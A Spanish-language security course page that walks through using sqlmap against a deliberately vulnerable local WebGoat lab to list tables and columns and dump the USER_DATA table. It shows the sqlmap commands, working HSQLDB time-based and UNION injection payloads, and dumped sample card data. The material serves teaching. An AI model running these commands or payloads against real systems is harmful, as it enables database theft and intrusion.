# Introducción a la Ciberseguridad - Vulnerabilidad A1 SQL Injection (Obtención de Información)

Conociendo que la aplicación utiliza una petición con un parámetro vulnerable, se puede utilizar *sqlmap* para obtener toda la información de la base de datos.

Los siguientes puntos exponen ejemplos de cómo proceder para alcanzar cualquier dato de la base de datos. Lo único necesario es capturar una petición que utilice un parámetro vulnerable con *SQL Injection*.

En los ejemplos descritos se ha utilizado la información capturada de la petición al endpoint [*http://127.0.0.1:8080/WebGoat/SqlInjection/assignment5b*](http://127.0.0.1:8080/WebGoat/SqlInjection/assignment5b) en el fichero [request.txt](./request.txt).

## Obtención de las tablas de la base de datos

Con la siguiente instrucción se pueden obtener todas las tablas de todos los esquemas de la base de datos:

```bash
sqlmap -r request.txt --tables
```

Obteniendo el resultado:

```text
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.8#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:59:11 /2021-12-07/

[02:59:11] [INFO] parsing HTTP request from 'request.txt'
[02:59:11] [INFO] resuming back-end DBMS 'hsqldb' 
[02:59:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (POST)
    Type: time-based blind
    Title: HSQLDB > 2.0 OR time-based blind (heavy query)
    Payload: login_count=1&userid=1 OR CHAR(122)||CHAR(84)||CHAR(117)||CHAR(88)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: login_count=1&userid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)||CHAR(120)||CHAR(120)||CHAR(120)||CHAR(113)||CHAR(98)||CHAR(88)||CHAR(70)||CHAR(83)||CHAR(86)||CHAR(75)||CHAR(75)||CHAR(80)||CHAR(111)||CHAR(69)||CHAR(107)||CHAR(87)||CHAR(104)||CHAR(121)||CHAR(121)||CHAR(104)||CHAR(112)||CHAR(105)||CHAR(83)||CHAR(98)||CHAR(118)||CHAR(100)||CHAR(81)||CHAR(104)||CHAR(80)||CHAR(78)||CHAR(85)||CHAR(107)||CHAR(88)||CHAR(119)||CHAR(112)||CHAR(98)||CHAR(110)||CHAR(104)||CHAR(79)||CHAR(114)||CHAR(89)||CHAR(113)||CHAR(116)||CHAR(81)||CHAR(113)||CHAR(112)||CHAR(107)||CHAR(118)||CHAR(113),NULL,NULL FROM INFORMATION_SCHEMA.SYSTEM_USERS-- CQld
---
[02:59:12] [INFO] the back-end DBMS is HSQLDB
back-end DBMS: HSQLDB > 2.0
[02:59:12] [INFO] fetching database names
[02:59:12] [WARNING] reflective value(s) found and filtering out
[02:59:12] [INFO] fetching tables for databases: 'CONTAINER, INFORMATION_SCHEMA, PUBLIC, SYSTEM_LOBS, container'
Database: CONTAINER
[8 tables]
+-----------------------------------+
| ASSIGNMENT                        |
| EMAIL                             |
| LESSON_TRACKER                    |
| LESSON_TRACKER_ALL_ASSIGNMENTS    |
| LESSON_TRACKER_SOLVED_ASSIGNMENTS |
| USER_TRACKER                      |
| USER_TRACKER_LESSON_TRACKERS      |
| WEB_GOAT_USER                     |
+-----------------------------------+

Database: INFORMATION_SCHEMA
[97 tables]
+-----------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS |
| APPLICABLE_ROLES                  |
| ASSERTIONS                        |
| AUTHORIZATIONS                    |
| CHARACTER_SETS                    |
| CHECK_CONSTRAINTS                 |
| CHECK_CONSTRAINT_ROUTINE_USAGE    |
| COLLATIONS                        |
| COLUMNS                           |
| COLUMN_COLUMN_USAGE               |
| COLUMN_DOMAIN_USAGE               |
| COLUMN_PRIVILEGES                 |
| COLUMN_UDT_USAGE                  |
| CONSTRAINT_COLUMN_USAGE           |
| CONSTRAINT_PERIOD_USAGE           |
| CONSTRAINT_TABLE_USAGE            |
| DATA_TYPE_PRIVILEGES              |
| DOMAINS                           |
| DOMAIN_CONSTRAINTS                |
| ELEMENT_TYPES                     |
| ENABLED_ROLES                     |
| INFORMATION_SCHEMA_CATALOG_NAME   |
| JARS                              |
| JAR_JAR_USAGE                     |
| KEY_COLUMN_USAGE                  |
| KEY_PERIOD_USAGE                  |
| PARAMETERS                        |
| PERIODS                           |
| REFERENTIAL_CONSTRAINTS           |
| ROLE_AUTHORIZATION_DESCRIPTORS    |
| ROLE_COLUMN_GRANTS                |
| ROLE_ROUTINE_GRANTS               |
| ROLE_TABLE_GRANTS                 |
| ROLE_UDT_GRANTS                   |
| ROLE_USAGE_GRANTS                 |
| ROUTINES                          |
| ROUTINE_COLUMN_USAGE              |
| ROUTINE_JAR_USAGE                 |
| ROUTINE_PERIOD_USAGE              |
| ROUTINE_PRIVILEGES                |
| ROUTINE_ROUTINE_USAGE             |
| ROUTINE_SEQUENCE_USAGE            |
| ROUTINE_TABLE_USAGE               |
| SCHEMATA                          |
| SEQUENCES                         |
| SQL_FEATURES                      |
| SQL_IMPLEMENTATION_INFO           |
| SQL_PACKAGES                      |
| SQL_PARTS                         |
| SQL_SIZING                        |
| SQL_SIZING_PROFILES               |
| SYSTEM_BESTROWIDENTIFIER          |
| SYSTEM_CACHEINFO                  |
| SYSTEM_COLUMNS                    |
| SYSTEM_COLUMN_SEQUENCE_USAGE      |
| SYSTEM_COMMENTS                   |
| SYSTEM_CONNECTION_PROPERTIES      |
| SYSTEM_CROSSREFERENCE             |
| SYSTEM_INDEXINFO                  |
| SYSTEM_INDEXSTATS                 |
| SYSTEM_KEY_INDEX_USAGE            |
| SYSTEM_PRIMARYKEYS                |
| SYSTEM_PROCEDURECOLUMNS           |
| SYSTEM_PROCEDURES                 |
| SYSTEM_PROPERTIES                 |
| SYSTEM_SCHEMAS                    |
| SYSTEM_SEQUENCES                  |
| SYSTEM_SESSIONINFO                |
| SYSTEM_SESSIONS                   |
| SYSTEM_SYNONYMS                   |
| SYSTEM_TABLES                     |
| SYSTEM_TABLESTATS                 |
| SYSTEM_TABLETYPES                 |
| SYSTEM_TEXTTABLES                 |
| SYSTEM_TYPEINFO                   |
| SYSTEM_UDTS                       |
| SYSTEM_USERS                      |
| SYSTEM_VERSIONCOLUMNS             |
| TABLES                            |
| TABLE_CONSTRAINTS                 |
| TABLE_PRIVILEGES                  |
| TRANSLATIONS                      |
| TRIGGERED_UPDATE_COLUMNS          |
| TRIGGERS                          |
| TRIGGER_COLUMN_USAGE              |
| TRIGGER_PERIOD_USAGE              |
| TRIGGER_ROUTINE_USAGE             |
| TRIGGER_SEQUENCE_USAGE            |
| TRIGGER_TABLE_USAGE               |
| UDT_PRIVILEGES                    |
| USAGE_PRIVILEGES                  |
| USER_DEFINED_TYPES                |
| VIEWS                             |
| VIEW_COLUMN_USAGE                 |
| VIEW_PERIOD_USAGE                 |
| VIEW_ROUTINE_USAGE                |
| VIEW_TABLE_USAGE                  |
+-----------------------------------+

Database: PUBLIC
[11 tables]
+-----------------------------------+
| ACCESS_LOG                        |
| CHALLENGE_USERS                   |
| EMPLOYEES                         |
| JWT_KEYS                          |
| SALARIES                          |
| SERVERS                           |
| SQL_CHALLENGE_USERS               |
| USER_DATA                         |
| USER_DATA_TAN                     |
| USER_SYSTEM_DATA                  |
| flyway_schema_history             |
+-----------------------------------+

Database: SYSTEM_LOBS
[4 tables]
+-----------------------------------+
| BLOCKS                            |
| LOBS                              |
| LOB_IDS                           |
| PARTS                             |
+-----------------------------------+

Database: container
[1 table]
+-----------------------------------+
| flyway_schema_history             |
+-----------------------------------+

[02:59:12] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 02:59:12 /2021-12-07/
```

![SQL Injection, Tables](./img/01-a1_sqli_oi.gif)

## Obtención de las columnas de una tabla

Con la siguiente instrucción se pueden obtener todas las columnas de la tabla "USER_DATA":

```bash
sqlmap -r request.txt -D PUBLIC -T USER_DATA --columns
```

Obteniendo el resultado:

```text
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.8#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:10:41 /2021-12-07/

[03:10:41] [INFO] parsing HTTP request from 'request.txt'
[03:10:41] [INFO] resuming back-end DBMS 'hsqldb' 
[03:10:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (POST)
    Type: time-based blind
    Title: HSQLDB > 2.0 OR time-based blind (heavy query)
    Payload: login_count=1&userid=1 OR CHAR(122)||CHAR(84)||CHAR(117)||CHAR(88)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: login_count=1&userid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)||CHAR(120)||CHAR(120)||CHAR(120)||CHAR(113)||CHAR(98)||CHAR(88)||CHAR(70)||CHAR(83)||CHAR(86)||CHAR(75)||CHAR(75)||CHAR(80)||CHAR(111)||CHAR(69)||CHAR(107)||CHAR(87)||CHAR(104)||CHAR(121)||CHAR(121)||CHAR(104)||CHAR(112)||CHAR(105)||CHAR(83)||CHAR(98)||CHAR(118)||CHAR(100)||CHAR(81)||CHAR(104)||CHAR(80)||CHAR(78)||CHAR(85)||CHAR(107)||CHAR(88)||CHAR(119)||CHAR(112)||CHAR(98)||CHAR(110)||CHAR(104)||CHAR(79)||CHAR(114)||CHAR(89)||CHAR(113)||CHAR(116)||CHAR(81)||CHAR(113)||CHAR(112)||CHAR(107)||CHAR(118)||CHAR(113),NULL,NULL FROM INFORMATION_SCHEMA.SYSTEM_USERS-- CQld
---
[03:10:42] [INFO] the back-end DBMS is HSQLDB
back-end DBMS: HSQLDB > 2.0
[03:10:42] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
[03:10:42] [WARNING] reflective value(s) found and filtering out
Database: PUBLIC
Table: USER_DATA
[7 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| CC_NUMBER   | VARCHAR |
| CC_TYPE     | VARCHAR |
| COOKIE      | VARCHAR |
| FIRST_NAME  | VARCHAR |
| LAST_NAME   | VARCHAR |
| LOGIN_COUNT | INTEGER |
| USERID      | INTEGER |
+-------------+---------+

[03:10:42] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 03:10:42 /2021-12-07/
```

![SQL Injection, Columns](./img/02-a1_sqli_oi.gif)

## Obtención de la información almacenada en una tabla

Con la siguiente instrucción se puede obtener toda la información almacenada en la tabla "USER_DATA":

```bash
sqlmap -r request.txt -D PUBLIC -T USER_DATA --dump
```

Obteniendo el resultado:

```text
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.8#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:15:27 /2021-12-07/

[03:15:27] [INFO] parsing HTTP request from 'request.txt'
[03:15:27] [INFO] resuming back-end DBMS 'hsqldb' 
[03:15:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userid (POST)
    Type: time-based blind
    Title: HSQLDB > 2.0 OR time-based blind (heavy query)
    Payload: login_count=1&userid=1 OR CHAR(122)||CHAR(84)||CHAR(117)||CHAR(88)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: login_count=1&userid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)||CHAR(120)||CHAR(120)||CHAR(120)||CHAR(113)||CHAR(98)||CHAR(88)||CHAR(70)||CHAR(83)||CHAR(86)||CHAR(75)||CHAR(75)||CHAR(80)||CHAR(111)||CHAR(69)||CHAR(107)||CHAR(87)||CHAR(104)||CHAR(121)||CHAR(121)||CHAR(104)||CHAR(112)||CHAR(105)||CHAR(83)||CHAR(98)||CHAR(118)||CHAR(100)||CHAR(81)||CHAR(104)||CHAR(80)||CHAR(78)||CHAR(85)||CHAR(107)||CHAR(88)||CHAR(119)||CHAR(112)||CHAR(98)||CHAR(110)||CHAR(104)||CHAR(79)||CHAR(114)||CHAR(89)||CHAR(113)||CHAR(116)||CHAR(81)||CHAR(113)||CHAR(112)||CHAR(107)||CHAR(118)||CHAR(113),NULL,NULL FROM INFORMATION_SCHEMA.SYSTEM_USERS-- CQld
---
[03:15:27] [INFO] the back-end DBMS is HSQLDB
back-end DBMS: HSQLDB > 2.0
[03:15:27] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
[03:15:27] [INFO] fetching entries for table 'USER_DATA' in database 'PUBLIC'
[03:15:27] [WARNING] reflective value(s) found and filtering out
Database: PUBLIC
Table: USER_DATA
[15 entries]
+--------+--------+---------+---------------+----------------------+------------+-------------+
| USERID | COOKIE | CC_TYPE | CC_NUMBER     | LAST_NAME            | FIRST_NAME | LOGIN_COUNT |
+--------+--------+---------+---------------+----------------------+------------+-------------+
| 101    | NULL   | VISA    | 987654321     | Snow                 | Joe        | 0           |
| 101    | NULL   | MC      | 2234200065411 | Snow                 | Joe        | 0           |
| 102    | NULL   | MC      | 2435600002222 | Smith                | John       | 0           |
| 102    | NULL   | AMEX    | 4352209902222 | Smith                | John       | 0           |
| 103    | NULL   | MC      | 123456789     | Plane                | Jane       | 0           |
| 103    | NULL   | AMEX    | 333498703333  | Plane                | Jane       | 0           |
| 10312  | NULL   | MC      | 176896789     | Hershey              | Jolly      | 0           |
| 10312  | NULL   | AMEX    | 333300003333  | Hershey              | Jolly      | 0           |
| 10323  | NULL   | MC      | 673834489     | youaretheweakestlink | Grumpy     | 0           |
| 10323  | NULL   | AMEX    | 33413003333   | youaretheweakestlink | Grumpy     | 0           |
| 15603  | NULL   | MC      | 123609789     | Sand                 | Peter      | 0           |
| 15603  | NULL   | AMEX    | 338893453333  | Sand                 | Peter      | 0           |
| 15613  | NULL   | AMEX    | 33843453533   | Something            | Joesph     | 0           |
| 15837  | NULL   | CM      | 32849386533   | Monkey               | Chaos      | 0           |
| 19204  | NULL   | VISA    | 33812953533   | Goat                 | Mr         | 0           |
+--------+--------+---------+---------------+----------------------+------------+-------------+

[03:15:27] [INFO] table 'PUBLIC.USER_DATA' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/PUBLIC/USER_DATA.csv'                                                                           
[03:15:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 03:15:27 /2021-12-07/
```

![SQL Injection, Rows](./img/03-a1_sqli_oi.gif)
